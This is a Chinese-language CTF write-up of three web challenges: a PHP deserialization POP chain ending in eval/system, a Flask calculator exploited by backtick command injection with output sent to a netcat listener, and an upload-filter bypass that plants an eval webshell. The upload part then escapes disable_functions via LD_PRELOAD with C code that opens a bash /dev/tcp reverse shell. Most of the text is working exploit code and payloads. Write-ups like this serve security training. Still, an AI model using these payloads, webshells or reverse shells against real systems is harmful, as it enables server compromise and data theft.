
ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    // Instantiates whatever class name is stored in $v1, passing $v2 to its
    // constructor, and echoes the object (which forces __toString on it).
    function eval() {
        $className = $this->v1;
        echo new $className($this->v2);
    }

    // Runs when a crow instance is used as a callable, e.g. `($obj)()`.
    // Forwards to $v1->world(); if $v1 has no world() method this lands in
    // that object's __call, which is the hop the chain relies on.
    public function __invoke()
    {
        $target = $this->v1;
        $target->world();
    }
}

class fin
{
    public $f1;

    // Entry point of the chain: runs when the object is destroyed (for the
    // challenge that is right after unserialize(), whose result is discarded).
    // The concatenation converts $f1 to a string, so an object in $f1 gets
    // its __toString called.
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    // Calls $f1 as a callable (closures and objects with __invoke qualify).
    public function run()
    {
        $callable = $this->f1;
        $callable();
    }

    // Fallback for any undefined method: the method name and arguments are
    // ignored and get_flag() is called on $f1, its return value echoed.
    public function __call($a, $b)
    {
        $holder = $this->f1;
        print $holder->get_flag();
    }

}

class what
{
    public $a;

    // Triggered by string conversion (the concatenation in fin::__destruct
    // is the one the chain uses). Calls run() on $a, then returns a fixed
    // string so the conversion itself succeeds.
    public function __toString()
    {
        $runner = $this->a;
        $runner->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    // Calls $m1 as a callable.
    public function run()
    {
        $callable = $this->m1;
        $callable();
    }

    // Final sink: eval() on attacker-controlled $m1. The leading '#' is a
    // line comment, so it only neutralises the first line -- a value that
    // starts with a newline runs everything after it.
    public function get_flag()
    {
        $code = '#' . $this->m1;
        eval($code);
    }
}

// NOTE(review): unserialize() on raw POST data with no allowed_classes
// restriction -- any class above can be instantiated and its magic methods
// (__destruct, __toString, __call, __invoke) fired. The return value is
// discarded, so the object is destroyed immediately and __destruct runs.
if (!isset($_POST['cmd'])) {
    highlight_file(__FILE__);
} else {
    unserialize($_POST['cmd']);
}

一道常规的反序列化题目。注意 `unserialize($_POST['cmd'])` 的返回值没有被接收,反序列化出来的对象在这一行执行完后立即销毁,`fin::__destruct` 随即触发。审计代码可以得到 pop 链为

fin::__destruct
↓↓↓
what::__toString
↓↓↓
mix::run
↓↓↓
crow::__invoke
↓↓↓
fin::__call
↓↓↓
mix::get_flag

对于 `eval('#' . $this->m1)`,`#` 只注释到行尾,因此让 `m1` 以换行符 `\n` 开头即可结束注释,后面的语句照常执行。构造如下(`$Fin` 是最外层对象,序列化后的字符串经 urlencode 作为 POST 参数 `cmd` 发送):

<?php
// Builds the POP chain, outermost object first:
//   fin::__destruct -> what::__toString -> mix::run -> crow::__invoke
//   -> fin::__call -> mix::get_flag (eval)
// NOTE(review): this script needs the challenge's class definitions in scope
// for serialize() to emit the right class names -- and with them present,
// fin::__destruct fires the very same chain locally at script shutdown, so the
// system() payload also runs on the machine generating the payload. Local
// copies of the classes with properties only (no method bodies) avoid that.

$entry  = new fin();   // outermost object; its destructor starts the chain
$spare  = new fin();   // unused; still echoes '114514' when destroyed
$toStr  = new what();
$outer  = new mix();
$invoke = new crow();
$catch  = new fin();
$sink   = new mix();

// Leading newline terminates the '#' comment inside get_flag()'s eval().
$sink->m1="\nsystem('find |xargs grep \"flag\"');";
$catch->f1  = $sink;    // __call -> $sink->get_flag()
$invoke->v1 = $catch;   // __invoke -> $catch->world() (undefined -> __call)
$outer->m1  = $invoke;  // run() -> ($invoke)()
$toStr->a   = $outer;   // __toString -> $outer->run()
$entry->f1  = $toStr;   // __destruct -> string conversion of $toStr

echo urlencode(serialize($entry));
?>


calc

一道常规的计算器题目,要想办法rce,以下给出了源码

/app.py

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

# Single Flask application object; routes below attach to it.
app=Flask(__name__)

def waf(s):
    """Return True when ``s`` contains none of the denylisted substrings.

    Matching is case-insensitive and substring-based (so e.g. ``os`` also
    rejects ``cos``). Side effect: the first offending token is printed.

    NOTE(review): this is a denylist, so anything not listed goes through --
    the backtick, for instance, is absent, which the writeup below uses to
    get shell command substitution inside the log command.
    """
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    lowered = s.lower()
    for token in blacklist:
        if token.lower() in lowered:
            print(token)
            return False
    return True

@app.route("/")
def index():
    """Landing page (welcome to SUctf2022): renders the static index template."""
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    """Evaluate the ``num`` request parameter and append it to a log file.

    Two sinks receive the untrusted ``num`` string more or less verbatim:
    ``eval(num)`` (arbitrary Python, guarded only by the denylist in ``waf``)
    and ``os.system(log)`` (a shell command built with ``str.format`` and no
    quoting). Both are reached only when ``waf(num)`` returns True.
    """
    ip = request.remote_addr
    # NOTE(review): a missing ``num`` yields None, and waf() then raises on
    # ``None.lower()`` -- there is no guard for that here.
    num = request.values.get("num")
    # Shell command string with the client value interpolated directly.
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

    if waf(num):
        try:
            # eval() runs first: ``num`` has to be a valid Python expression
            # before the shell command below is ever reached.
            data = eval(num)
            os.system(log)
        except:
            # Bare except swallows any failure; ``data`` is then unbound and the
            # return below raises UnboundLocalError instead of reporting it.
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    # Listens on every interface, port 5000; debug mode is not enabled here.
    app.run(host='0.0.0.0',port=5000)

代码中 `waf(s)` 是黑名单过滤,虽然屏蔽了 `(`、空格、`|`、`;` 等大量字符,但没有屏蔽反引号。`num` 先经过 `eval(num)`,随后又被 `format` 拼进 `os.system(log)` 的 shell 命令里,所以只要让 `num` 既是合法的 Python 表达式(用 `#` 把后半段变成 Python 注释),又在反引号里带上 shell 命令,shell 就会把反引号内命令的输出内联展开后执行。
构造 payload 并把回显带回到自己的服务器上(从监听结果可以看到整条 echo 的内容:时间戳、来源 IP,以及 `1+2#` 之后被展开的命令输出):

root@iZ2zec7mjp663ump9wsug3Z:~# nc -lvvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 117.21.200.166 36271 received!
20220404-132944 10.244.80.46 1+2#Th1s_is__F1114g bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

upgdstore

题目只让上传 php 文件(扩展名里含有 php 即可),但是对文件内容有许多过滤。尝试传入一句话木马,发现 `$` 被过滤,那就先传一个 `phpinfo();` 看看
访问phpinfo后发现有成堆的disable_functions,只有少数几个函数可以使用
可以考虑使用show_source()读取index.php

<?php
// First attempt: dump index.php via show_source(). Rejected by the upload
// content denylist (it lists "show_source"); note also that uploads land in
// ./uploads, so the relative path would have to be ../index.php anyway.
show_source('index.php');

测试后发现 show_source 在黑名单中(另外上传的文件位于 uploads/ 目录下,所以实际读取时路径要写成 ../index.php),于是可以用 base64 拼出函数名再当作可调用字符串使用,绕过对函数名的匹配

<?php
// "c2hvd19zb3VyZ2U=" decodes to "show_source", so the function name never
// appears literally in the uploaded bytes. The uploaded script runs from
// uploads/, hence the ../ in the target path.
$reader = base64_decode("c2hvd19zb3VyY2U=");
$reader("../index.php");

成功读取到源代码

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>

<?php
// Returns true when $var contains any denylisted substring, false otherwise.
// NOTE(review): strstr() is case-sensitive, so mixed-case spellings such as
// "Include" or "Eval" slip past every entry; stristr() would close that.
// The list also carries "copy" twice and "fwriter" (presumably meant to be
// "fwrite", which as written is not blocked).
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach ($blacklist as $needle) {
        if (strstr($var, $needle)) {
            return True;
        }
    }

    return False;
}
error_reporting(0);
// Upload directory, relative to this script.
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_name = $_FILES['upload_file']['name'];
    $ext = pathinfo($file_name,PATHINFO_EXTENSION);
    // The extension only has to *contain* "php" (case-insensitive): this is
    // an allow-list for PHP files, not a guard against them.
    if(!preg_match("/php/i", strtolower($ext))){
        die("只要好看的php");
    }

    $content = file_get_contents($temp_file);
    // Content denylist (fun() above); its strstr() matching is case-sensitive.
    if(fun($content)){
        die("诶,被我发现了吧");
    }
    // Stored name is md5(original name) plus the original extension, so the
    // file stays executable as PHP and the uploader can compute its path.
    $new_file_name = md5($file_name).".".$ext;
    $img_path = UPLOAD_PATH . '/' . $new_file_name;


    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
        die();
    }
    // Final path is echoed back to the uploader.
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

waf 函数中使用的 strstr() 是对大小写敏感的(改用 stristr() 或先 strtolower() 就能堵上),故可以用大小写绕过 waf
可以先以 base64 编码的形式上传一句话:上传内容是下面第一行的 base64,这样 `$_`、`eval` 都不会以明文出现在文件里;第二行是上传后按 md5(原文件名) 生成的新文件名

<?php @eval($_POST['mac']);?>
f3b94e88bd1bd325af6f62828c8785dd.php

再上传一个 php 文件,用 Include(首字母大写,绕过 strstr 对 include 的匹配)来包含刚刚的一句话,利用 php://filter 伪协议在包含时对 base64 解码;伪协议字符串本身也先 base64 编码后再在运行时解出

php://filter/convert.base64-decode/resource=./f3b94e88bd1bd325af6f62828c8785dd.php

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA==
<?php
// "Include" (capital I) dodges the case-sensitive strstr() check for
// "include" in the upload filter. The base64 argument decodes to the
// php://filter/convert.base64-decode/resource=... URL shown above, so the
// base64-encoded webshell is decoded on the fly and then included.
$wrapped = base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA==");
Include($wrapped);

成功 getshell,但由于 system() 等函数被 disable_functions 禁用,所以需要 bypass disable_functions(这里用 LD_PRELOAD 劫持 PHP 启动的子进程的方式)
本来想试一试蚁剑的插件,但是这个shell怎么都连不上,非常奇怪

先构造恶意exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Spawns an interactive bash with stdin/stdout/stderr bound to a TCP
 * connection back to ip:port (placeholders -- substitute before building). */
void payload(void)
{
    const char *cmd = "bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'";
    system(cmd);
}
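/*
 * Hook for geteuid(), picked up via LD_PRELOAD by whatever helper binary the
 * PHP process spawns (the writeup triggers it through mail()).
 * LD_PRELOAD is removed from the environment before the payload runs so the
 * bash started by system() does not load this library again and recurse.
 * Returns 0 on every path; the caller's use of the value is irrelevant here.
 */
int geteuid(void)
{
    if (getenv("LD_PRELOAD") == NULL)
    {
        return 0;
    }
    unsetenv("LD_PRELOAD");
    payload();
    return 0; /* was missing: falling off the end of a non-void function is UB */
}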

编译成so文件

# Build the hook as a position-independent shared object for LD_PRELOAD.
gcc -shared -fPIC -o exp.so exp.c

利用 move_uploaded_file 把编译好的 .so 传到服务器上(下面这一行的目标写的是 'www',而后面 LD_PRELOAD 引用的路径是 /var/www/html/uploads/aaaaa.so,实际使用时目标路径要与之一致)

// NOTE(review): the destination here is the literal 'www', while the
// LD_PRELOAD path used afterwards is /var/www/html/uploads/aaaaa.so --
// presumably the .so was written there; align the two before reuse.
move_uploaded_file($_FILES['upload_file']['tmp_name'],'www')

访问并反弹 shell:通过一句话先用 putenv() 设置 LD_PRELOAD,再调用 mail()——mail() 一般会启动外部的 sendmail 子进程,该子进程加载我们的 .so,调用 geteuid() 时即执行 payload。putenv 和 mail 虽然出现在上传过滤的黑名单里,但这里它们是通过 POST 发给已经落地的一句话执行的,不经过上传检查;前提是 disable_functions 没有禁掉这两个函数

mac=putenv("LD_PRELOAD=/var/www/html/uploads/aaaaa.so");mail("","","","","");